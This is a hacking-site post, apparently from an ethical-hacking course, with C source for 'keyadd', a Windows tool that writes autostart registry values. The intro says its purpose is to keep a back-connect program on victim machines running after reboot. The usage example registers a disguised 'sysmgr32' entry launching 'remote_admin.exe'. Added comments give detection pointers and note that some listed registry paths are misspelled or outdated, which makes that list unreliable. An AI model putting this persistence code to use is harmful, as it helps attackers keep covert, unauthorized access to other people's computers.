Filename | Adding your program to the autostart of a windows machine. |
Permission | rw-r--r-- |
Author | Unknown |
Date and Time | 6/10/2013 |
Label | Penetration |
./Arizona Team
During my CEH class, one of my students told me that he had created a program that gives him back a connection from the victim machine whenever he clicks on that file. The problem was that he would click the file just once; after the machine reboots, its IP address would almost certainly change, because many victims are on dynamic live IP addresses that change frequently. To get rid of this problem, we concluded that we would write a program to register our file for autostart, so that whenever the system reboots the file is executed automatically.
So logic flowed and we came up with a perfect program.
Go through the logical flow of the program; if you find any difficulty, you can send your query to instructor@arizonainfotech.com. Go through the code and create a new program for yourself.
And to all the stupid people who are misleading students by saying that programming knowledge is not needed for hacking: a humble request, stop manufacturing script kiddies in your institutes.
/*
Hacker PRO hona chahiye...
Expert toh Dish wash Bar bhi hai.
*/
Here is the code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <iostream.h>
#include <windows.h>
/* Forward declarations for the helpers defined further down in this file. */

/* Writes one string value under the table entry selected by keynum (a
 * 0-based index into Run[]); returns the OR of the two registry call results. */
int add_key(int keynum, char *keyname, char *keyvalue);
/* Prints the numbered list of registry paths held in Run[]. */
void show_keys(void);
/* Prompts on stdin for a path number, value name and value data, then
 * calls add_key() and exits the process. */
void interactiv(void);
/* Non-interactive variant: takes the 1-based key number from the command
 * line, calls add_key() and exits the process. */
void passiv_mode(int keynum, char *keyname, char *keyvalue);
/* Prints the usage text and exits the process. */
void help(char *progname);
/* Prints the program banner. */
void header(void);
/*
 * NULL-terminated table of the registry locations this tool can write to.
 * The position in the table is the "key number": callers take a 1-based
 * number from the user and decrement it before indexing (see Run[--num]
 * in interactiv() and --keynum in passiv_mode()).
 *
 * Each string starts with the hive name; add_key() picks the hive with
 * strstr() and passes the remainder of the string as the subkey.
 *
 * Defender note: these are the Run / RunOnce style autostart locations
 * catalogued as MITRE ATT&CK T1547.001 (Registry Run Keys / Startup
 * Folder). Auditing value-set events on them (for example Sysmon
 * event ID 13, RegistryEvent "Value Set") or reviewing them with an
 * autostart inventory tool surfaces entries written by programs like
 * this one. The HKEY_LOCAL_MACHINE entries need administrative rights to
 * modify; the HKEY_CURRENT_USER ones do not, which is why per-user keys
 * deserve the same monitoring as machine-wide ones.
 *
 * NOTE(review): two entries do not appear to match the paths Windows
 * itself uses -- "...\\Microsoft\\Explorer\\User Shell Folders" (the
 * documented key lives under "...\\Microsoft\\Windows\\CurrentVersion\\
 * Explorer\\...") and "...\\Polices\\..." (normally spelled "Policies").
 * Do not copy this list verbatim into detection rules; confirm each path.
 * NOTE(review): RunServices / RunServicesOnce look like Windows 9x-era
 * keys -- confirm whether they are honoured on the target OS version.
 */
char *Run[] = {
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
"HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Explorer\\User Shell Folders",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Run",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Polices\\Microsoft\\Windows\\System\\Scripts\\Startup",
NULL };
int main(int argc, char **argv)
{
int i, num, passiv = -1;
for(i = 1; i < argc; i++) {
if(strncmp(argv[i], "-h", 2) == 0) help(argv[0]);
if(strncmp(argv[i], "-s", 2) == 0) { show_keys(); exit(0x00); }
if(strncmp(argv[i], "-p", 2) == 0) passiv = 0;
}
if(passiv == -1) interactiv(); /* go interactiv mode */
if(argc != 5) help(argv[0]);
passiv_mode(atoi(argv[2]), /* key number */
argv[3], /* key name */
argv[4]); /* key value */
return(0x00);
}
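/* Discard whatever is left of the current input line (up to and including
 * the newline, or EOF). Replaces fflush(stdin), which is undefined
 * behaviour in standard C. */
static void discard_line(void)
{
    int c;

    while ((c = getchar()) != '\n' && c != EOF) {
        /* nothing */
    }
}

/*
 * Interactive mode: prints the banner and the table, reads a 1-based key
 * number, a value name and the value data from stdin, asks for
 * confirmation, calls add_key() and exits the process.
 *
 * Fixes over the original:
 *  - "%50[^\n]" could store 50 characters plus the terminator into a
 *    50-byte buffer (one-byte overflow); the width is now 49.
 *  - the selected number is range-checked before it is used to index
 *    Run[], so a bad number can no longer read outside the table.
 *  - scanf() results are checked, and fflush(stdin) is replaced by an
 *    explicit line discard.
 *  - the unused local buffer was removed.
 */
void interactiv(void)
{
    int num = 0;
    int count = 0;
    char keyname[50] = {0x00};
    char keyvalue[50] = {0x00};

    header();
    printf("\tINTERACTIVE MODE\n\n");
    show_keys();

    printf("\n\t select your favorite keypath: \n"); fflush(stdout);
    if (scanf("%d", &num) != 1) {
        printf("invalid key number\n");
        exit(1);
    }
    discard_line();

    /* Length of the NULL-terminated table bounds the valid selection. */
    while (Run[count] != NULL) count++;
    if (num < 1 || num > count) {
        printf("invalid key number\n");
        exit(1);
    }

    /* The prompts still say [0-50]; at most 49 characters are stored so
     * that the terminating NUL always fits. Longer input is truncated. */
    printf("type in the keyname [0-50]: \n"); fflush(stdout);
    if (scanf("%49[^\n]", keyname) != 1) {
        printf("invalid keyname\n");
        exit(1);
    }
    discard_line();

    printf("type in the keyvalue [0-50]: \n"); fflush(stdout);
    if (scanf("%49[^\n]", keyvalue) != 1) {
        printf("invalid keyvalue\n");
        exit(1);
    }
    discard_line();

    num--; /* user input is 1-based, the table is 0-based */
    printf("add key path %s with name %s and value %s\n", Run[num], keyname, keyvalue);
    printf("hit enter to add key (STRG+C to quit)\n");
    getchar();

    printf("keyadd=%s\n",
           ((add_key(num, keyname, keyvalue) == 0) ? "done" : "faild"));
    exit(0x00);
}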
void passiv_mode(int keynum, char *keyname, char *keyvalue)
{
add_key(--keynum, keyname, keyvalue);
exit(0x00);
}
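/*
 * Prints every entry of the NULL-terminated Run[] table, one per line, as
 * "<number>.\t<path>".
 *
 * The original did the printing inside the for-loop's increment expression
 * and both read i and evaluated i++ in the same argument list. Those two
 * accesses are unsequenced, which is undefined behaviour, so the printed
 * number depended on the compiler. The numbering is now explicitly 1-based,
 * matching the decrement that interactiv() and passiv_mode() apply to the
 * number the user supplies.
 */
void show_keys(void)
{
    int i;

    for (i = 0; Run[i] != NULL; i++) {
        printf("%d.\t%s\n", i + 1, Run[i]);
    }
}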
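/*
 * Creates or opens the registry key named by Run[keynumber] and sets the
 * string value keyname = keyvalue under it.
 *
 * keynumber 0-based index into Run[]
 * keyname   value name (NUL-terminated)
 * keyvalue  value data (NUL-terminated), stored as REG_SZ
 *
 * Returns 0 (ERROR_SUCCESS) on success, otherwise a Win32 error code.
 *
 * Fixes over the original:
 *  - keynumber and the pointer arguments are validated before use; an
 *    out-of-range index used to read outside the table.
 *  - the hive handle is no longer left uninitialised when no hive name
 *    matches.
 *  - RegSetValueEx() is only called when the key was actually opened, and
 *    the two status codes are no longer OR-ed together (which produced a
 *    value that is not a meaningful error code).
 *  - the key handle is closed with RegCloseKey(); it used to leak.
 *  - the byte count passed for REG_SZ data now includes the terminating
 *    NUL, as the API expects for string data.
 */
int add_key(int keynumber, char *keyname, char *keyvalue)
{
    LONG retval;
    HKEY hkey = NULL;
    HKEY constant = NULL;
    const char *path;
    const char *subkey;
    int count = 0;

    if (keyname == NULL || keyvalue == NULL)
        return ERROR_INVALID_PARAMETER;

    while (Run[count] != NULL) count++;
    if (keynumber < 0 || keynumber >= count)
        return ERROR_INVALID_PARAMETER;

    path = Run[keynumber];

    /* Map the textual hive prefix of the table entry to its handle. */
    if (strstr(path, "HKEY_CURRENT_USER") != NULL)
        constant = HKEY_CURRENT_USER;
    else if (strstr(path, "HKEY_USERS") != NULL)
        constant = HKEY_USERS;
    else if (strstr(path, "HKEY_LOCAL_MACHINE") != NULL)
        constant = HKEY_LOCAL_MACHINE;
    else
        return ERROR_INVALID_PARAMETER;

    /* As in the original, the subkey argument is the table entry from its
     * first backslash onwards. */
    subkey = strchr(path, '\\');
    if (subkey == NULL)
        return ERROR_INVALID_PARAMETER;

    retval = RegCreateKeyEx(constant, subkey, 0, 0, REG_OPTION_NON_VOLATILE,
                            KEY_ALL_ACCESS, NULL, &hkey, 0);
    if (retval != ERROR_SUCCESS)
        return (int)retval;

    retval = RegSetValueEx(hkey, keyname, 0, REG_SZ,
                           (const BYTE *)keyvalue,
                           (DWORD)(strlen(keyvalue) + 1));
    RegCloseKey(hkey);
    return (int)retval;
}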
/*
 * Writes the usage text to stdout and terminates the process with status 0.
 * progname is accepted for interface compatibility but is not used; the
 * text always refers to the tool as "addkey".
 */
void help(char *progname)
{
    static const char *const usage[] = {
        "addkey\n",
        "addkey [options]\n",
        "options\n",
        "-------\n",
        "-h: prints out help\n",
        "-s: shows all possible autostart regkeys\n",
        "-p: switch to passiv mode\n",
        "if you use the passiv mode the next argument after \"-p\" must\n",
        "be the keynumber. use the \"s\" swtich to see all keys and numbers\n",
        "next argument must be the keyname you want to add and then the value\n",
        "e.g.: addkey -p 1 sysmgr32 \"C:\\WINNT\\remote_admin.exe\"\n\n",
        "have fun!\n",
    };
    size_t line;

    (void)progname;

    /* None of the lines contains a conversion specifier, so writing them
     * verbatim produces the same output as the printf() calls did. */
    for (line = 0; line < sizeof usage / sizeof usage[0]; line++) {
        fputs(usage[line], stdout);
    }
    exit(0x00);
}
/* Writes the four-line program banner to stdout. */
void header(void)
{
    /* Adjacent string literals are concatenated by the compiler, so this
     * is a single write of the same four lines. */
    fputs("www.arizonainfotech.com\n"
          " - - - - \n"
          " keyadd \n"
          " - - - \n",
          stdout);
}